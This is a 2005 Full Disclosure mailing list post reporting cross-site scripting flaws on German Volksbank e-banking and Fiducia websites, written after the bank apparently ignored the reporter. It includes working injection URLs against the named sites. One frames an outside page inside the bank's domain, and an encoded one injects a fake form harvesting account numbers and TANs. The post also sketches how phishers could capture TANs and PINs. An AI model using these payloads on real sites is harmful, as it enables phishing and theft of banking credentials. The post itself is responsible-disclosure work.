Full Disclosure mailing list archives
CSS (Cross Site Scripting) on Germanys second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)
From: Constantin Hofstetter <constantin.hofstetter () gmail com>
Date: Thu, 22 Dec 2005 21:02:28 +0100
I emaild the Administrators 2 months ago - the only response I got was something like: "We will look into it, but we may or may not change anything on the page - who knows; we wont tell you!". I called them and the guy on the phone laughed at me. Here are the links / examples: *Original:* https://www.vr-ebanking.de/index.php?RZBK=0280 [vr-ebanking.de] *MY Version (CSS):* https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&Ini t Href=http://www.consti.de/secure<https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure>[ vr-ebanking.de] */Fälschung --> Imitation /* My local Banks Website: http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'<http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52> The Institute that should secure the financial institute's websites: http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10 <http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10> and so on.. The vr-ebanking site is used by millions of people each day for their daily financial stuff (ebanking) - someone (phisers) could easily use the CSS (Cross Site Scripting) to create real looking websites "within" the domain; More importantly they could create a website that does all the true login stuff (in the background) but sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql database full of working tans!). This is not looking to good for my bank, but they dont listen - -- Constantin Hofstetter http://www.consti.de Constantin.Hofstetter () gmail com mailmespam () gmail com
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- CSS (Cross Site Scripting) on Germanys second largest financial institute's ebanking portal (Volksbank Raiffeisenbank) Constantin Hofstetter (Dec 22)